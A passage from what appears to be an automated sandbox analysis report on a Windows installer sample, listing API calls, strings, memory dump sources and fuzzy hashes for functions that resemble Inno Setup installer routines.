                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: File$Attributes$Move
                                                                                            • String ID: $pI$isRS-%.3u.tmp
                                                                                            • API String ID: 3839737484-4128586672
                                                                                            • Opcode ID: ac93eb15cc30df3555ec8ee47a98c48700fec702651561ff72d2a5defb372c3c
                                                                                            • Instruction ID: 5157d7ee42b340b6017ae31c030909d6195775d38fcd81d7ef1a959590527e8d
                                                                                            • Opcode Fuzzy Hash: ac93eb15cc30df3555ec8ee47a98c48700fec702651561ff72d2a5defb372c3c
                                                                                            • Instruction Fuzzy Hash: B7217371E00209AFCF00EFA9C8919AFBBB8EB44318F11457BB814B72D1D63C9E018A59
                                                                                            APIs
                                                                                            • GetModuleHandleA.KERNEL32(user32.dll,ShutdownBlockReasonCreate), ref: 0042E94E
                                                                                            • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042E954
                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000FFF,00000000,user32.dll,ShutdownBlockReasonCreate), ref: 0042E97D
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressByteCharHandleModuleMultiProcWide
                                                                                            • String ID: ShutdownBlockReasonCreate$user32.dll
                                                                                            • API String ID: 828529508-2866557904
                                                                                            • Opcode ID: 215bc1b7bc83ffdf68daf534a2d56b4e30a92487d6c5dc46c4b8b9a3e95a1be6
                                                                                            • Instruction ID: 1d35fa7d7a5cedd0232cd267efd28fbcee77054966ca8dd586963fa292d83f31
                                                                                            • Opcode Fuzzy Hash: 215bc1b7bc83ffdf68daf534a2d56b4e30a92487d6c5dc46c4b8b9a3e95a1be6
                                                                                            • Instruction Fuzzy Hash: 58F0C2E134062136E660A67BACC2F6B15CC8F94729F54003BB108EA2C2E96C8945426F
                                                                                            APIs
                                                                                            • SetFileAttributesA.KERNEL32(00000000,00000020), ref: 004534BF
                                                                                              • Part of subcall function 00406F58: DeleteFileA.KERNEL32(00000000,0049A628,00496BB5,00000000,00496C0A,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000), ref: 00406F63
                                                                                            • MoveFileA.KERNEL32(00000000,00000000), ref: 004534E4
                                                                                              • Part of subcall function 00452AFC: GetLastError.KERNEL32(00000000,0045356D,00000005,00000000,004535A2,?,?,00000000,0049A628,00000004,00000000,00000000,00000000,?,00496869,00000000), ref: 00452AFF
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: File$AttributesDeleteErrorLastMove
                                                                                            • String ID: $pI$DeleteFile$MoveFile
                                                                                            • API String ID: 3024442154-1403374609
                                                                                            • Opcode ID: c3ba43a282ab64e4bd7258d017cc9cb201b328cdf06a165d105c793465f640fa
                                                                                            • Instruction ID: 0b1c975e4cad0da58cdf6a339e0cc25f4cbee2301ce5bab719f8a23037a79807
                                                                                            • Opcode Fuzzy Hash: c3ba43a282ab64e4bd7258d017cc9cb201b328cdf06a165d105c793465f640fa
                                                                                            • Instruction Fuzzy Hash: D4F062742141456AEB11FFA6D95266E67ECEB4434BFA0443BF800B76C3DA3C9E094929
                                                                                            APIs
                                                                                            • GetModuleHandleA.KERNEL32(user32.dll,ChangeWindowMessageFilter,?,0042E8E4,00000004,00498934,004563E9,0045678C,00456340,00000000,00000B06,00000000,00000000,00000001,00000000,00000002), ref: 0042E836
                                                                                            • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042E83C
                                                                                            • InterlockedExchange.KERNEL32(0049A660,00000001), ref: 0042E84D
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressExchangeHandleInterlockedModuleProc
                                                                                            • String ID: ChangeWindowMessageFilter$user32.dll
                                                                                            • API String ID: 3478007392-2498399450
                                                                                            • Opcode ID: 66ed2d7305b3b0eec70b6170d071817c925b739ceb1fb38ca2eb5854fddf3c51
                                                                                            • Instruction ID: 89e1f457e47db82f9faa956fb130fb356174019ed1a27fb48ec6c883adef8708
                                                                                            • Opcode Fuzzy Hash: 66ed2d7305b3b0eec70b6170d071817c925b739ceb1fb38ca2eb5854fddf3c51
                                                                                            • Instruction Fuzzy Hash: E4E08CA1340310EADA107BA26D8AF1A2654A320715F8C443BF080620E1C7BC0C60C95F
                                                                                            APIs
                                                                                            • GetWindowThreadProcessId.USER32(00000000), ref: 00476644
                                                                                            • GetModuleHandleA.KERNEL32(user32.dll,AllowSetForegroundWindow,00000000,?,?,0047673B,0049B050,00000000), ref: 00476657
                                                                                            • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0047665D
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressHandleModuleProcProcessThreadWindow
                                                                                            • String ID: AllowSetForegroundWindow$user32.dll
                                                                                            • API String ID: 1782028327-3855017861
                                                                                            • Opcode ID: 23d9d9cc46354639512b471ab02422c9b54f1bfd7ccda73b957914f4bb9bf9af
                                                                                            • Instruction ID: 0cf89beef61ef8a76223fb5aa8394d6e95b25c45a6fd57a36df02fca6db0c00c
                                                                                            • Opcode Fuzzy Hash: 23d9d9cc46354639512b471ab02422c9b54f1bfd7ccda73b957914f4bb9bf9af
                                                                                            • Instruction Fuzzy Hash: 79D0A9E0200F0169DD10B3F2AD47EAB329ECE84B10B92843B7408E3182CA3DE8404E3C
                                                                                            APIs
                                                                                            • GetModuleHandleA.KERNEL32(user32.dll,NotifyWinEvent,004970B6), ref: 0044EFD3
                                                                                            • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0044EFD9
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressHandleModuleProc
                                                                                            • String ID: NotifyWinEvent$dD$user32.dll
                                                                                            • API String ID: 1646373207-754903266
                                                                                            • Opcode ID: dc61cc67552be4efe4d14fef26ae15ab6e12dbd37892583342a89fc102010d4c
                                                                                            • Instruction ID: d2dc615c88fd328006faf79361cd74abdd3d8da8a377be2bcafca06377aa3dce
                                                                                            • Opcode Fuzzy Hash: dc61cc67552be4efe4d14fef26ae15ab6e12dbd37892583342a89fc102010d4c
                                                                                            • Instruction Fuzzy Hash: 37E012F0E41340AEFB00BFFB984271A3AA0B76431CB00007FB40066292CB7C48284A5F
                                                                                            APIs
                                                                                            • BeginPaint.USER32(00000000,?), ref: 00416C62
                                                                                            • SaveDC.GDI32(?), ref: 00416C93
                                                                                            • ExcludeClipRect.GDI32(?,?,?,?,?,?,00000000,00416D55), ref: 00416CF4
                                                                                            • RestoreDC.GDI32(?,?), ref: 00416D1B
                                                                                            • EndPaint.USER32(00000000,?,00416D5C,00000000,00416D55), ref: 00416D4F
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: Paint$BeginClipExcludeRectRestoreSave
                                                                                            • String ID:
                                                                                            • API String ID: 3808407030-0
                                                                                            • Opcode ID: fff015b19b690dcf37e11bf8aa5ec5ea438a56c4f54cc106c2c54c23c1b0a68c
                                                                                            • Instruction ID: c70ebf24aed337d2f43398dc79d2f74fb7d9fd2825851e0a0ce007a429ecfdc3
                                                                                            • Opcode Fuzzy Hash: fff015b19b690dcf37e11bf8aa5ec5ea438a56c4f54cc106c2c54c23c1b0a68c
                                                                                            • Instruction Fuzzy Hash: D7413C70A04204AFDB04DB99D985FAE77F9EB48304F1640AEE4059B362D778ED85CB58
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 26890b3473d1de9ad500ea3210d514958385b88118080daeb4b5d2349ec22244
                                                                                            • Instruction ID: fc599d946787c0506e623d191f8eefd10b4a308858d20a9272ac2d3790a9447e
                                                                                            • Opcode Fuzzy Hash: 26890b3473d1de9ad500ea3210d514958385b88118080daeb4b5d2349ec22244
                                                                                            • Instruction Fuzzy Hash: A1314F746047449FC320EF69C984BABB7E8AF89314F04891EF9D9C3752C638EC858B19
                                                                                            APIs
                                                                                            • SendMessageA.USER32(00000000,000000BB,?,00000000), ref: 00429818
                                                                                            • SendMessageA.USER32(00000000,000000BB,?,00000000), ref: 00429847
                                                                                            • SendMessageA.USER32(00000000,000000C1,00000000,00000000), ref: 00429863
                                                                                            • SendMessageA.USER32(00000000,000000B1,00000000,00000000), ref: 0042988E
                                                                                            • SendMessageA.USER32(00000000,000000C2,00000000,00000000), ref: 004298AC
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageSend
                                                                                            • String ID:
                                                                                            • API String ID: 3850602802-0
                                                                                            • Opcode ID: 5944dffaa8c0b8b44a765cdc0198bb50be024f609766e5ff2339194419bf2bce
                                                                                            • Instruction ID: c447c4a9eb68fcc7219df142ffdb21218ba7f26748626b58278b549ffff81a32
                                                                                            • Opcode Fuzzy Hash: 5944dffaa8c0b8b44a765cdc0198bb50be024f609766e5ff2339194419bf2bce
                                                                                            • Instruction Fuzzy Hash: 3321AF707507057AE710BB66CC82F5B76ACEB42708F94043EB541AB2D2DF78ED41825C
                                                                                            APIs
                                                                                            • GetSystemMetrics.USER32(0000000B), ref: 0041BBDA
                                                                                            • GetSystemMetrics.USER32(0000000C), ref: 0041BBE4
                                                                                            • 73A0A570.USER32(00000000,00000001,0000000C,0000000B,?,?), ref: 0041BC22
                                                                                            • 73A16310.GDI32(00000000,?,00000004,?,?,00000000,00000000,0041BD8D,?,00000000,00000001,0000000C,0000000B,?,?), ref: 0041BC69
                                                                                            • DeleteObject.GDI32(00000000), ref: 0041BCAA
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: MetricsSystem$A16310A570DeleteObject
                                                                                            • String ID:
                                                                                            • API String ID: 2246927583-0
                                                                                            • Opcode ID: 5f396e580eed0d8f1a1d4e3bb68adccfbdce92e17c2bbde9fea232aacb1b708e
                                                                                            • Instruction ID: d912de8c3c57523408de13a46bdb54385142bc6a2202aaac6113f7462e2bca5d
                                                                                            • Opcode Fuzzy Hash: 5f396e580eed0d8f1a1d4e3bb68adccfbdce92e17c2bbde9fea232aacb1b708e
                                                                                            • Instruction Fuzzy Hash: CE314F74E00209EFDB04DFA5C941AAEB7F5EB48700F11856AF514AB381D7789E40DB98
                                                                                            APIs
                                                                                              • Part of subcall function 0045C76C: SetLastError.KERNEL32(00000057,00000000,0045C838,?,?,?,?,00000000), ref: 0045C7D7
                                                                                            • GetLastError.KERNEL32(00000000,00000000,00000000,00472630,?,?,0049B178,00000000), ref: 004725E9
                                                                                            • GetLastError.KERNEL32(00000000,00000000,00000000,00472630,?,?,0049B178,00000000), ref: 004725FF
                                                                                            Strings
                                                                                            • Failed to set permissions on registry key (%d)., xrefs: 00472610
                                                                                            • Could not set permissions on the registry key because it currently does not exist., xrefs: 004725F3
                                                                                            • Setting permissions on registry key: %s\%s, xrefs: 004725AE
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLast
                                                                                            • String ID: Could not set permissions on the registry key because it currently does not exist.$Failed to set permissions on registry key (%d).$Setting permissions on registry key: %s\%s
                                                                                            • API String ID: 1452528299-4018462623
                                                                                            • Opcode ID: b6a47f64f510fce16551a7a9453ce12765f8589f174dbaf3fa05134ae08179ca
                                                                                            • Instruction ID: 4334e49d385bf692f2cc32478bc4a2497c1f2fe716dd62bcd395c3eafaa3e5f2
                                                                                            • Opcode Fuzzy Hash: b6a47f64f510fce16551a7a9453ce12765f8589f174dbaf3fa05134ae08179ca
                                                                                            • Instruction Fuzzy Hash: 9C218370A046445FCB01DBAAD9827EEBBE4EB49314F50817BE408E7392D7B85D05CBA9
                                                                                            APIs
                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 00403CDE
                                                                                            • SysAllocStringLen.OLEAUT32(?,00000000), ref: 00403CE9
                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 00403CFC
                                                                                            • SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00403D06
                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00403D15
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: ByteCharMultiWide$AllocString
                                                                                            • String ID:
                                                                                            • API String ID: 262959230-0
                                                                                            • Opcode ID: 3d91154ea29cb477aba9f2cf37b6340c14ba569e13ff3378e354d6e20d937e44
                                                                                            • Instruction ID: 657f84db466bd1c54801a2b30447fc2084338491f8142acf58a262d5883cef98
                                                                                            • Opcode Fuzzy Hash: 3d91154ea29cb477aba9f2cf37b6340c14ba569e13ff3378e354d6e20d937e44
                                                                                            • Instruction Fuzzy Hash: FCF0A4917442043BF21025A65C43F6B198CCB82B9BF50053FB704FA1D2D87C9D04427D
                                                                                            APIs
                                                                                            • 73A08830.GDI32(00000000,00000000,00000000), ref: 00414429
                                                                                            • 73A022A0.GDI32(00000000,00000000,00000000,00000000), ref: 00414431
                                                                                            • 73A08830.GDI32(00000000,00000000,00000001,00000000,00000000,00000000,00000000), ref: 00414445
                                                                                            • 73A022A0.GDI32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000), ref: 0041444B
                                                                                            • 73A0A480.USER32(00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000), ref: 00414456
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: A022A08830$A480
                                                                                            • String ID:
                                                                                            • API String ID: 3036329673-0
                                                                                            • Opcode ID: 161378f607458cb0647fc0ae293b672cc47cdd04cd22de7490c53bd54400d8e0
                                                                                            • Instruction ID: 307ee49d89b37f6f535ee678b6e17b633f9af621dfcf88cb872c79a1e2d754b8
                                                                                            • Opcode Fuzzy Hash: 161378f607458cb0647fc0ae293b672cc47cdd04cd22de7490c53bd54400d8e0
                                                                                            • Instruction Fuzzy Hash: A901D47121C3406AD200B63D8C45B9F6BEC8FC6314F05546EF494D7382C97ACC018765
                                                                                            APIs
                                                                                            • WNetGetUniversalNameA.MPR(00000000,00000001,?,00000400), ref: 0040700B
                                                                                            • WNetOpenEnumA.MPR(00000001,00000001,00000000,00000000,?), ref: 00407085
                                                                                            • WNetEnumResourceA.MPR(?,FFFFFFFF,?,?), ref: 004070DD
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: Enum$NameOpenResourceUniversal
                                                                                            • String ID: Z
                                                                                            • API String ID: 3604996873-1505515367
                                                                                            • Opcode ID: 9cf142189d4ecfc6757bb5486cc46db394a4e60b729a9f9f9915b5c39fe8e999
                                                                                            • Instruction ID: 2d8f00a968b5306eb49df96258ffff6df6a72a1db963417fd4edcb7bb2ad48f8
                                                                                            • Opcode Fuzzy Hash: 9cf142189d4ecfc6757bb5486cc46db394a4e60b729a9f9f9915b5c39fe8e999
                                                                                            • Instruction Fuzzy Hash: C1513070E04208ABDB15DF55CD41A9EBBB9FB49304F1041BAE910BB3D1C778AE458F5A
                                                                                            APIs
                                                                                            • SetRectEmpty.USER32(?), ref: 0044C8A2
                                                                                            • DrawTextA.USER32(00000000,00000000,00000000,?,00000D20), ref: 0044C8CD
                                                                                            • DrawTextA.USER32(00000000,00000000,00000000,00000000,00000800), ref: 0044C955
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: DrawText$EmptyRect
                                                                                            • String ID:
                                                                                            • API String ID: 182455014-2867612384
                                                                                            • Opcode ID: 6c05f6fd2de5f0114c24d089b6121ea037cee5e3f80eca8d109fa4c4a1bfdb21
                                                                                            • Instruction ID: 68feaf95479c8b0f8d19ac4d8bed049c81d0e9902cdc902b6301711e3864cdc7
                                                                                            • Opcode Fuzzy Hash: 6c05f6fd2de5f0114c24d089b6121ea037cee5e3f80eca8d109fa4c4a1bfdb21
                                                                                            • Instruction Fuzzy Hash: 435152B0A01248AFDB50DFA5C885BDEBBF8FF49304F08447AE845EB251D7789944CB64
                                                                                            APIs
                                                                                            • 73A0A570.USER32(00000000,00000000,0042EF3C,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 0042EE12
                                                                                              • Part of subcall function 0041A1F8: CreateFontIndirectA.GDI32(?), ref: 0041A2B7
                                                                                            • SelectObject.GDI32(?,00000000), ref: 0042EE35
                                                                                            • 73A0A480.USER32(00000000,?,0042EF21,00000000,0042EF1A,?,00000000,00000000,0042EF3C,?,?,?,?,00000000,00000000,00000000), ref: 0042EF14
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: A480A570CreateFontIndirectObjectSelect
                                                                                            • String ID: ...\
                                                                                            • API String ID: 2998766281-983595016
                                                                                            • Opcode ID: e7ebfea45444ea9c11b2851c030b1c82e81be4d7c359b89fb9621dfee32d1b04
                                                                                            • Instruction ID: f7e46b9156472dd3d3dfb1d2a9ceb23c9820bf6754630174aa29599cfb354949
